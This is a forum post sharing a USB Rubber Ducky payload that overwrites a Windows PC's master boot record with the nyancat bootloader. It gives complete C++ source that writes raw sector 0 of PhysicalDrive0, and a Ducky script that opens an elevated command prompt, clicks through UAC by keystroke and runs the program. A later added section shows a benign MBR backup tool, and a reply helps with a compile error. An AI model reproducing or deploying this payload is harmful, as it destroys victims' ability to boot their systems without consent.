[DANGEROUS] Nyancat Bootloader Overwrite


ThoughtfulDev

Credits: https://github.com/brainsmoke/nyanmbr (he wrote a freaking bootloader with nyancat... AMAZING)

I made a payload to overwrite your bootloader with the nyancat bootloader, which will render your PC USELESS.

CAUTION: This will brick your bootloader. DO NOT TRY THIS on your OWN PC; USE A VM.

1. Download the precompiled boot.exe (source code is here if you want to compile yourself):

#include <windows.h>
#include <iostream>

int main(int argc, char* argv[]){
	DWORD dw;
	const char *pathToBin = "boot.bin";
	// Raw handle to the first physical disk. Opening it requires administrator rights,
	// which is why the Ducky script below goes through the UAC prompt first.
	// CreateFileA is used explicitly so the narrow string literals compile regardless
	// of whether the project is built with UNICODE defined.
	HANDLE drive = CreateFileA("\\\\.\\PhysicalDrive0", GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0);
	if (drive != INVALID_HANDLE_VALUE){
		HANDLE binary = CreateFileA(pathToBin, GENERIC_READ, 0, 0, OPEN_EXISTING, 0, 0);
		if (binary != INVALID_HANDLE_VALUE){
			DWORD size = GetFileSize(binary, 0);
			// Writes to a raw disk handle must be whole sectors, so boot.bin has to be a
			// multiple of the sector size (512 bytes for a classic MBR).
			if (size > 0){
				BYTE *mbr = new BYTE[size];
				if (ReadFile(binary, mbr, size, &dw, 0)){
					std::cout << "Binary file successfully read!" << std::endl;
					// The drive handle starts at offset 0, i.e. sector 0: the MBR.
					if (WriteFile(drive, mbr, size, &dw, 0)){
						std::cout << "First sector overwritten successfully!" << std::endl;
					}
					else
						std::cerr << "Fatal error! Can't overwrite 1st sector!" << std::endl;
				}
				else
					std::cerr << "Error reading from binary file!" << std::endl;
				delete[] mbr;
			}
			else
				std::cerr << "Invalid binary file!" << std::endl;
			CloseHandle(binary);
		}
		else{
			std::cerr << "Can't find the binary file to read from!" << std::endl;
		}
		CloseHandle(drive);
	}
	else
		std::cerr << "Administrator privileges required!" << std::endl;
	return 0;
}

2. Create a folder named exec on your Ducky SD card and copy boot.exe into it.

3. Download the img file from https://github.com/brainsmoke/nyanmbr, rename it to boot.bin, and put it at DUCKY\exec\boot.bin.

4. Here is the Duckyscript (make sure your SD card is labeled DUCKY):

REM I am NOT responsible for ANY DAMAGE
REM overwrites bootloader with https://github.com/brainsmoke/nyanmbr
DELAY 5000
ESCAPE
DELAY 500
CONTROL ESCAPE
DELAY 500
STRING cmd
DELAY 500
CTRL-SHIFT ENTER
DELAY 1000
REM replace with the desired UAC Alt + key combo (y for Yes in English, j for German, etc.)
ALT y
DELAY 1500
STRING for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do %a
ENTER
DELAY 300
STRING cd exec
ENTER
DELAY 300
STRING boot.exe
ENTER
DELAY 1000
STRING exit
ENTER

 

I have also added this payload to my PyDuckGen (https://github.com/ThoughtfulDev/PyDuckGen), which makes generating payloads easier.

 

boot.exe

Edited by ThoughtfulDev
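Before running a payload like this, even in a VM, it is worth looking at what sector 0 actually holds and keeping a copy of it. The following is an added example, not code from the original post or from nyanmbr: a portable C++ program that reads the first 512 bytes of a device or image file, parses the MBR partition table and boot signature, and saves a backup that can later be written back with the same kind of raw write the payload performs. The device paths, file names and the sample MBR are assumptions.

```cpp
// Added example (not from the original post or nyanmbr): inspect and back up a
// 512-byte MBR so a real partition table can be told apart from a wiped or
// replaced sector, and restored afterwards. Paths and file names are assumptions.
#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <fstream>
#include <string>
#include <vector>

constexpr std::size_t kSectorSize    = 512;
constexpr std::size_t kBootCodeSize  = 446;  // boot code precedes the partition table
constexpr std::size_t kPartEntrySize = 16;   // four 16-byte entries follow it

struct PartitionEntry {
    bool     bootable;  // status byte 0x80 = active/bootable
    uint8_t  type;      // partition type id, e.g. 0x07 for NTFS (0 = unused slot)
    uint32_t lbaStart;  // first sector, little-endian on disk
    uint32_t sectors;   // length in sectors, little-endian on disk
};

struct MbrInfo {
    bool validSignature;                     // bytes 510..511 are 0x55 0xAA
    std::vector<PartitionEntry> partitions;  // only the non-empty slots
};

static uint32_t le32(const uint8_t* p) {
    return uint32_t(p[0]) | (uint32_t(p[1]) << 8) | (uint32_t(p[2]) << 16) | (uint32_t(p[3]) << 24);
}

// Parse the classic MBR layout out of one sector's worth of bytes.
MbrInfo parseMbr(const std::vector<uint8_t>& sector) {
    MbrInfo info{false, {}};
    if (sector.size() < kSectorSize) return info;
    info.validSignature = (sector[510] == 0x55 && sector[511] == 0xAA);
    for (int i = 0; i < 4; ++i) {
        const uint8_t* e = &sector[kBootCodeSize + i * kPartEntrySize];
        if (e[4] == 0) continue;  // empty slot
        info.partitions.push_back({(e[0] & 0x80) != 0, e[4], le32(e + 8), le32(e + 12)});
    }
    return info;
}

// Read the first sector of a device or image file; empty vector on failure.
// On Windows the path would be \\.\PhysicalDrive0 (administrator required),
// on Linux something like /dev/sda; a disk image file works the same way.
std::vector<uint8_t> readFirstSector(const std::string& path) {
    std::ifstream in(path, std::ios::binary);
    std::vector<uint8_t> buf(kSectorSize);
    if (!in.read(reinterpret_cast<char*>(buf.data()), kSectorSize)) return {};
    return buf;
}

// Write a sector buffer to a file (the backup copy).
bool saveSector(const std::string& path, const std::vector<uint8_t>& sector) {
    std::ofstream out(path, std::ios::binary);
    return bool(out.write(reinterpret_cast<const char*>(sector.data()), sector.size()));
}

// Constructed sample MBR: one active NTFS partition starting at LBA 2048.
std::vector<uint8_t> buildSampleMbr() {
    std::vector<uint8_t> s(kSectorSize, 0);
    uint8_t* e = &s[kBootCodeSize];
    e[0] = 0x80; e[4] = 0x07;
    uint32_t start = 2048, len = 1000000;
    for (int i = 0; i < 4; ++i) { e[8 + i] = uint8_t(start >> (8 * i)); e[12 + i] = uint8_t(len >> (8 * i)); }
    s[510] = 0x55; s[511] = 0xAA;
    return s;
}

void describe(const MbrInfo& info) {
    std::printf("boot signature: %s\n", info.validSignature ? "present" : "MISSING");
    for (const auto& p : info.partitions)
        std::printf("  type 0x%02x%s start %u len %u\n", p.type, p.bootable ? " (active)" : "", p.lbaStart, p.sectors);
}

int main(int argc, char* argv[]) {
    // Usage: mbrinspect <device-or-image> [backup-file]; with no arguments the sample MBR is shown.
    std::vector<uint8_t> sector = argc > 1 ? readFirstSector(argv[1]) : buildSampleMbr();
    if (sector.empty()) { std::fprintf(stderr, "cannot read %s\n", argv[1]); return 1; }
    describe(parseMbr(sector));
    if (argc > 2 && !saveSector(argv[2], sector)) { std::fprintf(stderr, "backup failed\n"); return 1; }
    return 0;
}
```

Run it against the VM's disk before step 4 and again after the payload has executed; the difference in the output is exactly what a bootloader overwrite costs you. The backup file is a plain 512-byte sector and can be written back over sector 0 with a raw write of the same kind the payload uses.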

4 hours ago, Neptunium said:

Error: argument of type "char *" is incompatible with parameter of type "LPCWSTR"

This isn't really the source code's problem, but an issue with your compiler configuration. I assume you're using Visual Studio, and if you are - you need to configure your project to use the Multi-Byte Character Set (Found in the project properties under the General section, iirc). You can alternatively cast to a LPCWSTR, but that isn't a better option.

I would recommend reading about the different character types that you will encounter in Windows C++ development here.
